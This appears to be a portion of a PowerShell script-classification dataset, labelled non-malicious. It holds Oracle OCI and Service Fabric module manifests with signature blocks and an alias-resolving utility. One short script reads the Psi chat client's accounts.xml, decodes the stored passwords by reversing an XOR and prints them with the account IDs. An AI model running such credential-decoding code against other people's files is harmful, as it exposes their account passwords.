'' SIG '' GSt+wJS00mFt6zPZxd9LBADMfRyVw4/3IbKyEbe7f/LV '' SIG '' jHAsQWCqsWMYRJUadmJ+9oCw++hkpjPRiQfhvbfmQ6QY '' SIG '' uKZ3AeEPlAwhHbJUKSWJbOUOUlFHdL4mrLZBdd56rF+N '' SIG '' P8m800ERElvlEFDrMcXKchYiCd98THU/Y+whX8QgUWtv '' SIG '' sauGi0/C1kVfnSD8oR7FwI+isX4KJpn15GkvmB0t9dmp '' SIG '' sh3lGwIDAQABo4IBOjCCATYwDwYDVR0TAQH/BAUwAwEB '' SIG '' /zAdBgNVHQ4EFgQU7NfjgtJxXWRM3y5nP+e6mK4cD08w '' SIG '' HwYDVR0jBBgwFoAUReuir/SSy4IxLVGLp6chnfNtyA8w '' SIG '' DgYDVR0PAQH/BAQDAgGGMHkGCCsGAQUFBwEBBG0wazAk '' SIG '' BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQu '' SIG '' Y29tMEMGCCsGAQUFBzAChjdodHRwOi8vY2FjZXJ0cy5k '' SIG '' aWdpY2VydC5jb20vRGlnaUNlcnRBc3N1cmVkSURSb290 '' SIG '' Q0EuY3J0MEUGA1UdHwQ+MDwwOqA4oDaGNGh0dHA6Ly9j '' SIG '' cmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJ '' SIG '' RFJvb3RDQS5jcmwwEQYDVR0gBAowCDAGBgRVHSAAMA0G '' SIG '' CSqGSIb3DQEBDAUAA4IBAQBwoL9DXFXnOF+go3QbPbYW '' SIG '' 1/e/Vwe9mqyhhyzshV6pGrsi+IcaaVQi7aSId229GhT0 '' SIG '' E0p6Ly23OO/0/4C5+KH38nLeJLxSA8hO0Cre+i1Wz/n0 '' SIG '' 96wwepqLsl7Uz9FDRJtDIeuWcqFItJnLnU+nBgMTdydE '' SIG '' 1Od/6Fmo8L8vC6bp8jQ87PcDx4eo0kxAGTVGamlUsLih '' SIG '' Vo7spNU96LHc/RzY9HdaXFSMb++hUD38dglohJ9vytsg '' SIG '' jTVgHAIDyyCwrFigDkBjxZgiwbJZ9VVrzyerbHbObyMt '' SIG '' 9H5xaiNrIv8SuFQtJ37YOtnwtoeW/VvRXKwYw02fc7cB '' SIG '' qZ9Xql4o4rmUMYIDdjCCA3ICAQEwdzBjMQswCQYDVQQG '' SIG '' EwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xOzA5 '' SIG '' BgNVBAMTMkRpZ2lDZXJ0IFRydXN0ZWQgRzQgUlNBNDA5 '' SIG '' NiBTSEEyNTYgVGltZVN0YW1waW5nIENBAhAFRK/zlJ0I '' SIG '' Oaa/2z9f5WEWMA0GCWCGSAFlAwQCAQUAoIHRMBoGCSqG '' SIG '' SIb3DQEJAzENBgsqhkiG9w0BCRABBDAcBgkqhkiG9w0B '' SIG '' CQUxDxcNMjQwNDE5MDEyNDI2WjArBgsqhkiG9w0BCRAC '' SIG '' DDEcMBowGDAWBBRm8CsywsLJD4JdzqqKycZPGZzPQDAv '' SIG '' BgkqhkiG9w0BCQQxIgQgTW1QCwefpk4wFNvcriZ1tMSM '' SIG '' fVSmztT3MPHqANymGsYwNwYLKoZIhvcNAQkQAi8xKDAm '' SIG '' MCQwIgQg0vbkbe10IszR1EBXaEE2b4KK2lWarjMWr00a '' SIG '' mtQMeCgwDQYJKoZIhvcNAQEBBQAEggIAabjkdlt6CVsf '' SIG '' CeO4iIgzSS7mV4sdIPsWlpOR9r8+JZa/E5LzfBoQATsc '' SIG '' shyG5PPKf8boj2sdjaLiYvTc7JBbYucQ2omEIgwDBLwM '' SIG '' dvrnAlJ4FIe5iy+x4EnUU6FKboI2mhI2h1VOz9hAfeT2 '' SIG '' jI/aDxgUYcB43jqpfdmHGK5j6FTw44qX+qSYyBfcyW9m '' SIG '' DSde34dPtgOoT/eCAcvfEN20BAH8vi8IBLrVgeQua2Cp '' SIG '' 22KjLkmZ0astT0LSnO9AoPddG1k+QZTgGDczI+18Fkvl '' SIG '' ghPLOECrbkUtLYWkzEKewq50M74Mgizs/jgU31+RMGYc '' SIG '' Pvc1/VIQ6enf5jWME2yH9aD/dc3GWPJ7yUsseQR9rtQ7 '' SIG '' CbsA6xoC2Hfl6jwK4IF61zRTb3lGsaVCevF/Ku9srttk '' SIG '' wCOc5BwEp/L2dfAjFtT9ujcbpHk/Xqs4RPINZV5VhwTy '' SIG '' 8paEj0SQuDQg2mgWmSfqs3yoY/CEu1bzPlsHPO2AoKrW '' SIG '' 1/cLVT8taRfjzqynr+OsrCUHRwCrqkpIJE4I/3Dn6Y3k '' SIG '' yWdtMNNzy4TrboTV+CA1lNmWA35ohMh8vqlzVcwygFH7 '' SIG '' aURSq+dtyKyR222O9t4AsbQofglxC5AIee3N5C1UOE1K '' SIG '' s2l3sQQRSTb2welXSwy55W5Lx09z/+WhbsOHIeSLNaXy '' SIG '' 7FIw3HS7peA= '' SIG '' End signature block
combined_dataset/train/non-malicious/sample_54_57.ps1
sample_54_57.ps1
# # Module manifest for module 'OCI.PSModules.Tenantmanagercontrolplane' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Tenantmanagercontrolplane.dll' # Version number of this module. ModuleVersion = '83.2.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '6b57c3ab-69f1-4092-a5c1-380523593dd4' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Tenantmanagercontrolplane Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.2.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Tenantmanagercontrolplane.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Add-OCITenantmanagercontrolplaneGovernance', 'Enable-OCITenantmanagercontrolplaneOrder', 'Get-OCITenantmanagercontrolplaneAssignedSubscription', 'Get-OCITenantmanagercontrolplaneAssignedSubscriptionLineItemsList', 'Get-OCITenantmanagercontrolplaneAssignedSubscriptionsList', 'Get-OCITenantmanagercontrolplaneAvailableRegionsList', 'Get-OCITenantmanagercontrolplaneDomain', 'Get-OCITenantmanagercontrolplaneDomainGovernance', 'Get-OCITenantmanagercontrolplaneDomainGovernancesList', 'Get-OCITenantmanagercontrolplaneDomainsList', 'Get-OCITenantmanagercontrolplaneLink', 'Get-OCITenantmanagercontrolplaneLinksList', 'Get-OCITenantmanagercontrolplaneOrder', 'Get-OCITenantmanagercontrolplaneOrganization', 'Get-OCITenantmanagercontrolplaneOrganizationsList', 'Get-OCITenantmanagercontrolplaneOrganizationTenanciesList', 'Get-OCITenantmanagercontrolplaneOrganizationTenancy', 'Get-OCITenantmanagercontrolplaneRecipientInvitation', 'Get-OCITenantmanagercontrolplaneRecipientInvitationsList', 'Get-OCITenantmanagercontrolplaneSenderInvitation', 'Get-OCITenantmanagercontrolplaneSenderInvitationsList', 'Get-OCITenantmanagercontrolplaneSubscription', 'Get-OCITenantmanagercontrolplaneSubscriptionLineItemsList', 'Get-OCITenantmanagercontrolplaneSubscriptionMapping', 'Get-OCITenantmanagercontrolplaneSubscriptionMappingsList', 'Get-OCITenantmanagercontrolplaneSubscriptionsList', 'Get-OCITenantmanagercontrolplaneWorkRequest', 'Get-OCITenantmanagercontrolplaneWorkRequestErrorsList', 'Get-OCITenantmanagercontrolplaneWorkRequestLogsList', 'Get-OCITenantmanagercontrolplaneWorkRequestsList', 'Invoke-OCITenantmanagercontrolplaneApproveOrganizationTenancyForTransfer', 'Invoke-OCITenantmanagercontrolplaneIgnoreRecipientInvitation', 'Invoke-OCITenantmanagercontrolplaneUnapproveOrganizationTenancyForTransfer', 'New-OCITenantmanagercontrolplaneChildTenancy', 'New-OCITenantmanagercontrolplaneDomain', 'New-OCITenantmanagercontrolplaneDomainGovernance', 'New-OCITenantmanagercontrolplaneSenderInvitation', 'New-OCITenantmanagercontrolplaneSubscriptionMapping', 'Receive-OCITenantmanagercontrolplaneRecipientInvitation', 'Remove-OCITenantmanagercontrolplaneDomain', 'Remove-OCITenantmanagercontrolplaneDomainGovernance', 'Remove-OCITenantmanagercontrolplaneGovernance', 'Remove-OCITenantmanagercontrolplaneLink', 'Remove-OCITenantmanagercontrolplaneOrganizationTenancy', 'Remove-OCITenantmanagercontrolplaneSubscriptionMapping', 'Restore-OCITenantmanagercontrolplaneOrganizationTenancy', 'Stop-OCITenantmanagercontrolplaneSenderInvitation', 'Update-OCITenantmanagercontrolplaneDomain', 'Update-OCITenantmanagercontrolplaneDomainGovernance', 'Update-OCITenantmanagercontrolplaneOrganization', 'Update-OCITenantmanagercontrolplaneRecipientInvitation', 'Update-OCITenantmanagercontrolplaneSenderInvitation' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Tenantmanagercontrolplane' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/Resolve-Aliases _2.7.ps1
Resolve-Aliases _2.7.ps1
#requires -version 2.0 ## ResolveAliases Module v 1.6 ######################################################################################################################## ## Sample Use: ## Resolve-Aliases Script.ps1 | Set-Content Script.Resolved.ps1 ## ls *.ps1 | Resolve-Aliases -Inplace ######################################################################################################################## ## Version History ## 1.0 - First Version. "It worked on my sample script" ## 1.1 - Now it parses the $(...) blocks inside strings ## 1.2 - Some tweaks to spacing and indenting (I really gotta get some more test case scripts) ## 1.3 - I went back to processing the whole script at once (instead of a line at a time) ## Processing a line at a time makes it impossible to handle Here-Strings... ## I'm considering maybe processing the tokens backwards, replacing just the tokens that need it ## That would mean I could get rid of all the normalizing code, and leave the whitespace as-is ## 1.4 - Now resolves parameters too ## 1.5 - Fixed several bugs with command resolution (the ? => ForEach-Object problem) ## - Refactored the Resolve-Line filter right out of existence ## - Created a test script for validation, and ## 1.6 - Added resolving parameter ALIASES instead of just short-forms ## 1.7 - Minor tweak to make it work in CTP3 ## ## * *TODO:* Put back the -FullPath option to resolve cmdlets with their snapin path ## * *TODO:* Add an option to put #requires statements at the top for each snapin used ######################################################################################################################## function which { PARAM( [string]$command ) # aliases, functions, cmdlets, scripts, executables, normal files $cmds = @(Get-Command $command -EA "SilentlyContinue") if($cmds.Count -gt 1) { $cmd = @( $cmds | Where-Object { $_.Name -match "^$([Regex]::Escape($command))" })[0] } else { $cmd = $cmds[0] } if(!$cmd) { $cmd = @(Get-Command "Get-$command" -EA "SilentlyContinue" | Where-Object { $_.Name -match "^Get-$([Regex]::Escape($command))" })[0] } if( $cmd.CommandType -eq "Alias" ) { $cmd = which $cmd.Definition } return $cmd } function Resolve-Aliases { [CmdletBinding(ConfirmImpact="low",DefaultParameterSetName="Files")] Param ( [Parameter(Position=0, Mandatory=$true, ValueFromPipeline=$true, ParameterSetName="Text")] [string]$Line , [Parameter(Position=0, Mandatory=$true, ValueFromPipeline=$true, ParameterSetName="Files")] [Alias("FullName","PSChildName","PSPath")] [IO.FileInfo]$File , [Parameter(Position=1, ParameterSetName="Files")] [Switch]$InPlace ) BEGIN { Write-Debug $PSCmdlet.ParameterSetName } PROCESS { if($PSCmdlet.ParameterSetName -eq "Files") { if($File -is [System.IO.FileInfo]){ $Line = ((Get-Content $File) -join "`n") } else { throw "We can't resolve a whole folder at once yet" } } $Tokens = [System.Management.Automation.PSParser]::Tokenize($Line,[ref]$null) for($t = $Tokens.Count; $t -ge 0; $t--) { $token = $Tokens[$t] # DEBUG $token | fl * | out-host switch($token.Type) { "Command" { $cmd = which $token.Content Write-Debug "Command $($token.Content) => $($cmd.Name)" #if($cmd.CommandType -eq "Alias") { $Line = $Line.Remove( $token.Start, $token.Length ).Insert( $token.Start, $cmd.Name ) #} } "CommandParameter" { Write-Debug "Parameter $($token.Content)" for($c = $t; $c -ge 0; $c--) { if( $Tokens[$c].Type -eq "Command" ) { $cmd = which $Tokens[$c].Content # if($cmd.CommandType -eq "Alias") { # $cmd = @(which $cmd.Definition)[0] # } $short = $token.Content -replace "^-?","^" Write-Debug "Parameter $short" $parameters = $cmd.ParameterSets | Select -expand Parameters $param = @($parameters | Where-Object { $_.Name -match $short -or $_.Aliases -match $short} | Select -Expand Name -Unique) if($param.Count -eq 1) { $Line = $Line.Remove( $token.Start, $token.Length ).Insert( $token.Start, "-$($param[0])" ) } break } } } } } switch($PSCmdlet.ParameterSetName) { "Text" { $Line } "Files" { switch($File.GetType()) { "System.IO.FileInfo" { if($InPlace) { $Line | Set-Content $File } else { $Line } } default { throw "We can't resolve a whole folder at once yet" } } } default { throw "ParameterSet: $($PSCmdlet.ParameterSetName)" } } } }
combined_dataset/train/non-malicious/Decrypt Psi Password_1.ps1
Decrypt Psi Password_1.ps1
function decrypt-psi ($jid, $pw) { $OFS = ""; $u = 0; for($p=0;$p -lt $pw.Length;$p+=4) { [char]([int]"0x$($pw[$p..$($p+3)])" -bxor [int]$jid[$u++]) } } $accounts = ([xml](cat ~\\psidata\\profiles\\default\\accounts.xml))["accounts"]["accounts"] foreach($account in ($accounts | gm a[0-9]*)) { $a = $accounts.$($account.Name) "$($a.jid.'#text'):$( decrypt-psi $a.jid.'#text' $a.password.'#text' )" }
combined_dataset/train/non-malicious/sample_67_58.ps1
sample_67_58.ps1
@{ # Script module or binary module file associated with this manifest. RootModule = 'Microsoft.ServiceFabric.Powershell' # Version number of this module. ModuleVersion = '3.1.0.0' # ID used to uniquely identify this module GUID = 'd2c42633-5254-4a82-a312-1dc0697a55cd' # Author of this module Author = 'Microsoft Corporation' # Company or vendor of this module CompanyName = 'Microsoft Corporation' # Copyright statement for this module Copyright = '(c) 2013 Microsoft Corporation. All rights reserved.' # Description of the functionality provided by this module Description = 'Powershell cmdlets to manage a Windows Fabric deployment' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '3.0' # Name of the Windows PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the Windows PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of the .NET Framework required by this module DotNetFrameworkVersion = '4.5' # Minimum version of the common language runtime (CLR) required by this module # CLRVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module # RequiredModules = @() # Assemblies that must be loaded prior to importing this module RequiredAssemblies = @() # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module TypesToProcess = @('Microsoft.ServiceFabric.Powershell.Types.ps1xml') # Format files (.ps1xml) to be loaded when importing this module FormatsToProcess = @('Microsoft.ServiceFabric.Powershell.Format.ps1xml') # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module FunctionsToExport = '*' # Cmdlets to export from this module CmdletsToExport = '*' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module AliasesToExport = '*' # List of all modules packaged with this module. # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' # HelpInfo URI of this module HelpInfoURI = 'http://go.microsoft.com/fwlink/?LinkID=521412' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' } # SIG # Begin signature block # MIInvgYJKoZIhvcNAQcCoIInrzCCJ6sCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBAlp/RQZ7KuK2j # 3wn2wOF3QyM2W1daVORGlPe7QViUnKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ4wghmaAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDo+l7QIaMD44uYuH+d2Uksx # Obwi+sCGtE131CTBxKYGMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAwy7HjrzzCwTHKAfSz/Oe3BWEnrJqHDQUBpShBucblgoG+IzgO4KdbCQQ # uYSU+VC3FVasElnE92eqIeodmJspa1x5GQqAVMqyWhUjHIe8HHneYbsk5B6UkUs9 # CJJByxZkbpec6E8WrRvCLDCa9TByeoeJZeEDVCDsoZ01mNFZUxt6t8IbhIux1ctx # ZO6NjKUpv/qTxyqpIJ4q8B1RWXee77vYG+2fDAY/4Ymp6AdwMCzrxD068xPhErLX # 2DW5yqPULx7c/UKDpjwwPjuxZXwepkRlbCwainmZfvhvehHLJoD2sKZlDzY4C2Pt # djF7pCLPtDTo++oNPnkRAnNmaxdxdqGCFygwghckBgorBgEEAYI3AwMBMYIXFDCC # FxAGCSqGSIb3DQEHAqCCFwEwghb9AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFYBgsq # hkiG9w0BCRABBKCCAUcEggFDMIIBPwIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBzRdNwqWr/iOtJxHB4HKyA/FAD6XhaB7O7BAgCT8d5jgIGZa67qQoD # GBIyMDI0MDEyOTEyNTQwNy4xN1owBIACAfSggdikgdUwgdIxCzAJBgNVBAYTAlVT # MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK # ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVs # YW5kIE9wZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMdVGhhbGVzIFRTUyBFU046 # ODZERi00QkJDLTkzMzUxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNl # 